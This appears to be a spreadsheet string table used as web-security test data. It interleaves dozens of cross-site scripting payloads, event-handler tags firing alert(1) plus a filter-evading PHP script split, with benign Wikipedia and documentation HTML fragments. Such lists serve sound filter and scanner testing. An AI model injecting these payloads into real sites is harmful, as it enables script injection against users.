    <t>&lt;ol onmouseout="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;i ondblclick="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;div class="reflist columns references-column-width" style="-moz-column-width: 30em; -webkit-column-width: 30em; column-width: 30em; list-style-type: decimal;"&gt;</t>
  </si>
  <si>
    <t>&lt;video onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/video&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmousedown="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;span onbeforepaste="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup draggable="true" ondragstart="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;element onpaste="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animate onbegin=alert(1) attributeName=x dur=1s&gt;</t>
  </si>
  <si>
    <t>&lt;iframe oncut="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;image2 onpointerleave=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t>&lt;rb onmousedown="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Formal_system" title="Formal system"&gt;Formal system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style onpointerleave=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;embed id=x onfocusin=alert(1) type=text/html&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onbeforepaste="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFDoweHajek1997"&gt;Dowe &amp;amp; Hajek 1997 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onkeypress="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointerleave=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;dfn id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;199–233, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-184"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-184"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Wilhelm_Wundt" title="Wilhelm Wundt"&gt;Wilhelm Wundt &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;header ondrop=alert(1) contenteditable&gt;drop here&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;ins oncut="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;summary ondblclick="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Index_of_philosophy_of_mind_articles" title="Index of philosophy of mind articles"&gt;more... &lt;/a&gt; &lt;/i&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Multi-task_learning" title="Multi-task learning"&gt;Multi-task learning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Philosophy_of_science" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Philosophy_of_science" title="Philosophy of science"&gt;Philosophy of science &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;slot ondrop=alert(1) contenteditable&gt;drop here&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;a id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;nobr oncopy="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Catastrophe_theory" title="Catastrophe theory"&gt;Catastrophe theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;template onkeypress="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Hutson, Matthew (16 February 2018). &lt;a rel="nofollow" class="external text" href="http://science.sciencemag.org/content/359/6377/725"&gt;"Artificial intelligence faces reproducibility crisis" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/Science_Magazine" class="mw-redirect" title="Science Magazine"&gt;Science &lt;/a&gt; &lt;/i&gt;. pp.&amp;#160;725–726. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2018Sci...359..725H"&gt;2018Sci...359..725H &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.359.6377.725"&gt;10.1126/science.359.6377.725 &lt;/a&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;28 April </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-363"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-363"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;details onpointerenter=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;optgroup ondrop=alert(1) contenteditable&gt;drop here&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;ins id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;dl id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/dl&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		 &lt;/h3&gt;</t>
  </si>
  <si>
    <t>&lt;meta id=x tabindex=1 onactivate=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;source style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;ol onkeypress="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointerout=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Eliezer_Yudkowsky" title="Eliezer Yudkowsky"&gt;Eliezer Yudkowsky &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;track draggable="true" ondragstart="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;meta onpointerout=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;th onpointermove=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmouseup="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;content draggable="true" ondrag="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onbeforepaste="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/coroutines.html"&gt;Coroutines&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link id=x tabindex=1 onactivate=alert(1)&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;rtificial general intelligence &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmouseover="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Stuart_Kauffman" title="Stuart Kauffman"&gt;Stuart Kauffman &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frame draggable="true" ondragenter="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolution_strategy" title="Evolution strategy"&gt;Evolution strategy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;audio onclick="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;ins draggable="true" ondragend="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onmouseup="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;template onbeforecut="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-354"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-354"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;td draggable="true" ondrag="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;b onkeydown="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;dd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;403–408, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_clinical_research" title="Glossary of clinical research"&gt;Clinical research &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointerenter=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The study of non-learning &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural networks &lt;/a&gt;&lt;sup id="cite_ref-Neural_networks_219-1" class="reference"&gt;&lt;a href="#cite_note-Neural_networks-219"&gt;&amp;#91;213&amp;#93; &lt;/a&gt; &lt;/sup&gt; began in the decade before the field of AI research was founded, in the work of &lt;a href="/wiki/Walter_Pitts" title="Walter Pitts"&gt;Walter Pitts &lt;/a&gt; and &lt;a href="/wiki/Warren_McCullouch" class="mw-redirect" title="Warren McCullouch"&gt;Warren McCullouch &lt;/a&gt;. &lt;a href="/wiki/Frank_Rosenblatt" title="Frank Rosenblatt"&gt;Frank Rosenblatt &lt;/a&gt; invented the &lt;a href="/wiki/Perceptron" title="Perceptron"&gt;perceptron &lt;/a&gt;, a learning network with a single layer, similar to the old concept of &lt;a href="/wiki/Linear_regression" title="Linear regression"&gt;linear regression &lt;/a&gt;. Early pioneers also include &lt;a href="/wiki/Alexey_Grigorevich_Ivakhnenko" class="mw-redirect" title="Alexey Grigorevich Ivakhnenko"&gt;Alexey Grigorevich Ivakhnenko &lt;/a&gt;, &lt;a href="/wiki/Teuvo_Kohonen" title="Teuvo Kohonen"&gt;Teuvo Kohonen &lt;/a&gt;, &lt;a href="/wiki/Stephen_Grossberg" title="Stephen Grossberg"&gt;Stephen Grossberg &lt;/a&gt;, &lt;a href="/wiki/Kunihiko_Fukushima" title="Kunihiko Fukushima"&gt;Kunihiko Fukushima &lt;/a&gt;, &lt;a href="/wiki/Christoph_von_der_Malsburg" title="Christoph von der Malsburg"&gt;Christoph von der Malsburg &lt;/a&gt;, &lt;a href="/w/index.php?title=David_Willshaw&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="David Willshaw (page does not exist)"&gt;David Willshaw &lt;/a&gt;, &lt;a href="/wiki/Shun-Ichi_Amari" class="mw-redirect" title="Shun-Ichi Amari"&gt;Shun-Ichi Amari &lt;/a&gt;, &lt;a href="/wiki/Bernard_Widrow" title="Bernard Widrow"&gt;Bernard Widrow &lt;/a&gt;, &lt;a href="/wiki/John_Hopfield" title="John Hopfield"&gt;John Hopfield &lt;/a&gt;, &lt;a href="/wiki/Eduardo_R._Caianiello" title="Eduardo R. Caianiello"&gt;Eduardo R. Caianiello &lt;/a&gt;, and others&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1945) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;slot id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Joseph_Weizenbaum" title="Joseph Weizenbaum"&gt;Joseph Weizenbaum &lt;/a&gt;'s critique of AI:</t>
  </si>
  <si>
    <t>&lt;ins onblur=alert(1) tabindex=1 id=x&gt;&lt;/ins&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=The+Economist+Explains%3A+Why+firms+are+piling+into+artificial+intelligence&amp;amp;rft.date=2016-03-31&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fblogs%2Feconomist-explains%2F2016%2F04%2Feconomist-explains&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Decisions_theory_and_analysis-213"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Decisions_theory_and_analysis_213-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;meta onpointerenter=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 10.3, 17.5 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;shadow oncopy="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;spacer draggable="true" ondragstart="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;aside id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;source onpointerup=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;361–381, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Epiphenomenalism" title="Epiphenomenalism"&gt;Epiphenomenalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-pmid31835078-23"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-pmid31835078_23-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;xss style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;span&gt;&lt;a href="/wiki/File:Octicons-terminal.svg" class="image"&gt;&lt;img alt="icon" src="//upload.wikimedia.org/wikipedia/commons/thumb/6/6f/Octicons-terminal.svg/24px-Octicons-terminal.svg.png" decoding="async" width="24" height="28" class="noviewer" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/6/6f/Octicons-terminal.svg/37px-Octicons-terminal.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/6/6f/Octicons-terminal.svg/49px-Octicons-terminal.svg.png 2x" data-file-width="896" data-file-height="1024" /&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;xmp onmouseover="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointerout=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;param id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmousedown="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onpointerleave=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;video onpointerout=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;form oncontextmenu="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;canvas id=x tabindex=1 onfocus=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;? echo('&lt;SCR)'; echo('IPT&gt;alert("")&lt;/SCRIPT&gt;'); ?&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;button id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-341"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-341"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;cite onblur=alert(1) tabindex=1 id=x&gt;&lt;/cite&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;img srcset=validimage.png onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFGladwell2005"&gt;Gladwell 2005 &lt;/a&gt; (Gladwell's &lt;i&gt;&lt;a href="/wiki/Blink_(book)" class="mw-redirect" title="Blink (book)"&gt;Blink &lt;/a&gt; &lt;/i&gt; is a popular introduction to sub-symbolic reasoning and knowledge.) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot draggable="true" ondragleave="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">					&lt;span aria-disabled='false' title='Changes must be reviewed before being displayed on this page.' class='flaggedrevs-icon oo-ui-widget oo-ui-widget-enabled oo-ui-iconElement-icon oo-ui-icon-articleSearch oo-ui-iconElement oo-ui-labelElement-invisible oo-ui-iconWidget'&gt; </t>
  </si>
  <si>
    <t>&lt;form onbeforepaste="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;time onbeforecopy="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-propublica.org-383"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-propublica.org_383-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-propublica.org_383-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-propublica.org_383-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;param style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onmouseleave="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;nav onkeydown="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Hypostatic_abstraction" title="Hypostatic abstraction"&gt;Hypostatic abstraction &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/spider-middleware.html"&gt;&lt;span class="doc"&gt;Spider Middleware</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;strong id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.7/"&gt;1.7&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;cite ondragover=alert(1) contenteditable&gt;drop here&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Eliminative_materialism" title="Eliminative materialism"&gt;Eliminative materialism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:ParticleSwarmArrowsAnimation.gif" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;A &lt;a href="/wiki/Particle_swarm_optimization" title="Particle swarm optimization"&gt;particle swarm &lt;/a&gt; seeking the &lt;a href="/wiki/Global_minimum" class="mw-redirect" title="Global minimum"&gt;global minimum &lt;/a&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Buttazzo, G. (July 2001). "Artificial consciousness: Utopia or real possibility?". &lt;i&gt;&lt;a href="/wiki/Computer_(magazine)" title="Computer (magazine)"&gt;Computer &lt;/a&gt; &lt;/i&gt;. &lt;b&gt;34 &lt;/b&gt; (7): 24–30. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2F2.933500"&gt;10.1109/2.933500 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Computer&amp;amp;rft.atitle=Artificial+consciousness%3A+Utopia+or+real+possibility%3F&amp;amp;rft.volume=34&amp;amp;rft.issue=7&amp;amp;rft.pages=24-30&amp;amp;rft.date=2001-07&amp;amp;rft_id=info%3Adoi%2F10.1109%2F2.933500&amp;amp;rft.aulast=Buttazzo&amp;amp;rft.aufirst=G.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;ruby id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;nav ondragover=alert(1) contenteditable&gt;drop here&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;rb onmousemove="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointermove=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;li class="wy-breadcrumbs-aside"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Harmony_search" class="mw-redirect" title="Harmony search"&gt;Harmony search &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_geography_terms" title="Glossary of geography terms"&gt;Geography &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;q id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/q&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointerdown=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="John_McCarthy" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Further information: &lt;a href="/wiki/Computer_art" title="Computer art"&gt;Computer art &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;template id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;In the early 1970s, &lt;a href="/wiki/Kenneth_Colby" title="Kenneth Colby"&gt;Kenneth Colby &lt;/a&gt; presented a version of Weizenbaum's &lt;a href="/wiki/ELIZA" title="ELIZA"&gt;ELIZA &lt;/a&gt; known as DOCTOR which he promoted as a serious therapeutic tool. (&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;132–144) </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;textarea style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;History of AI </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;rt id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;img onkeyup="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointerout=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;animatetransform onpointerover=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmouseleave="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onactivate=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>document.getElementsByClassName("").length</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;100–101, who writes that there are "two major branches of artificial intelligence: one aimed at producing intelligent behavior regardless of how it was accomplished, and the other aimed at modeling intelligent processes found in nature, particularly human ones." &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;strong onload=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, ~I.2.8, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;audio draggable="true" ondragstart="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
